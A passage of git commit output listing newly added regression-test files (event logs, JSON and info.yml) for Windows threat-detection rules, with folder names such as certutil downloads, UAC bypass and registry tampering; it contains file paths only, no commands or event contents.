regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml create mode 100644 